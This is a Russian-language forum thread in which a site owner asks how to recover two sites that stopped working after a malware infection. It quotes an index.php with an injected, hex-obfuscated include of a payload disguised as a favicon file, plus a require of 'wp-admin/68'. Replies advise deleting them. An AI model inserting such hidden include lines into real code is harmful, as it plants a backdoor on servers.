После заражения вирусом сайтов — перестали работать. Как исправить?

Question

[ligisayan]

Всем привет! Есть 2 сайта e-montazh.by и chrisal.by расположенные на одном аккаунте, который паразило вирусом. Теперь при заходе на 1 отображает пустую страницу, а на второй - срабатывает циклическая переадресация. Вроде бы всю нечисть очистил помощью aibolit, но результат не меняется.
Проверил через различные сервисы - пишет чисто, единственное согласно отчету rescan.pro есть одна переадресация в e-montazh.by , но поиску в файлах ничего не могу обнаружить.
Для сайта же chrisal.by сервис
redirectdetective.com показывает циклическую переадресацию

В файле index.php содержится:

<?php
/*9b897*/
@include "\x2fho\x6de/\x65mo\x6eta\x7ah/\x70ub\x6cic\x5fht\x6dl/\x63hr\x69sa\x6c.b\x79/c\x61ta\x6cog\x2fmo\x64el\x2fto\x74al\x2ffa\x76ic\x6fn_\x39c1\x624a\x2eic\x6f";
/*9b897*/ @require('wp-admin/68');
// Version
define('VERSION', '1.5.5.1');
// Configuration
if (file_exists('config.php')) {
	require_once('config.php');
}  
// Install 
if (!defined('DIR_APPLICATION')) {
	header('Location: install/index.php');
	exit;
}

Куда копать дальше, чтобы восстановить доступы?

Answer 1

[Семён Белоглазов]

Ну так удалите

@include "\x2fho\x6de/\x65mo\x6eta\x7ah/\x70ub\x6cic\x5fht\x6dl/\x63hr\x69sa\x6c.b\x79/c\x61ta\x6cog\x2fmo\x64el\x2fto\x74al\x2ffa\x76ic\x6fn_\x39c1\x624a\x2eic\x6f";

Comments

[ligisayan]

Batlab удалил. результат не изменился..

[Семён Белоглазов]

ligisayan: Тогда проверьте файлы:
1. wp-admin/68
2. config.php
3. install/index.php
Возможно в них есть что-то

[ligisayan]

Batlab: 1. wp-admin/68 удалил.
ну, по крайней мере переадресация ушла, но ни на один сайт не заходит..

[Семён Белоглазов]

ligisayan: если это wordpress, то скорее всего у вас удалились темы